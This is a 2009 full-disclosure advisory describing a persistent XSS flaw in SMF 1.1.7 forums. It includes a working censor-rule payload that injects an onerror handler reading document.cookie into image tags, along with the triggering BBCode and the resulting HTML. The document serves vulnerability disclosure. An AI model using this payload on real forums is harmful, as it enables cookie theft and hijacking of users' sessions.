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SMF 1.1.7 Persistent XSS (requires permision to edit censor)
| From: |
Eduardo Vela <sirdarckcat gmail com> |
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submit milw0rm com, full-disclosure lists grok org uk, bugtraq securityfocus com |
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SMF 1.1.7 Persistent XSS (requires permision to edit censor) |
| Date: |
Tue - Feb 03, 2009 12:37 AM |
SMF 1.1.7 (simplemachines.org) XSS
Exploitation:
If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor
Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)
And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]
And the HTML code generated will be..
<img src="http://www.test-xss/" onerror="alert(document.cookie)"
alt="" border="0" />
Notes:
- SMF is not using httpOnly cookies.
- I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..
Greetings!!
-- Eduardo
http://www.sirdarckcat.net/
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